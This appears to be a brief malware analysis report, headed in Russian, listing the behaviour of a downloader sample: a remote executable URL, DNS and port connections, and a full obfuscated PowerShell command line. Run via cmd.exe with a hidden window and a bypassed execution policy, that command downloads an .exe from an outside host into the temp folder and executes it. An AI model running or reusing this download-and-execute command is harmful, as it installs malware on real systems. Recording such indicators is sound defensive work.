Техническая информация
- http://baxx.us/323.exe как %temp%\\entry.exe
- '<SYSTEM32>\cmd.exe' /C PowersHeLl.EXe -WINdOWSTyLE HIDDEN -NoproFile -eXecuTIONPolIcy bypAsS (NEw-OBJEcT SysTEm.NeT.WEBCliEnT).DOWNLOADFIle('http://baxx.us/323.exe','%TEMP%\\Entry.exe') & %TEMP%\\Entry.exe
- 'ba#x.us':80
- 'ba#x.us':443
- http://ba#x.us/323.exe
- 'ba#x.us':443
- DNS ASK ba#x.us